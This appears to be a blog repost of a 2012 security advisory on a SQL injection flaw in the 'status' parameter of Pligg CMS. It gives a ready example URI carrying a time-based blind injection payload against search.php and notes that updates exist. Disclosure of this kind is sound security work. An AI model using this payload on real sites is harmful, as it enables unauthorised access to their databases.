The Exploits :
Attackers can use a browser to exploit this issue.
The following example URI is available:
hxxp://www.example.com/Audits/CMS/pligg_1.1.2/search.php?adv=1&status='and+sleep(9)or+sleep(9)or+1%3D' &search=on&advancesearch= Search+&sgroup=on&stags=0&slink=on&scategory=on&scomments=0&suser=0
Solution:
Updates are available. Please see the references for more details.
Saturday, May 5, 2012
Pligg CMS 'status' Parameter SQL Injection Vulnerability
Do you want to share?
Do you like this story?
YOU MIGHT ALSO LIKE
Subscribe to:
Post Comments (Atom)
RSS Feed
Twitter
Facebook
0 comments:
Post a Comment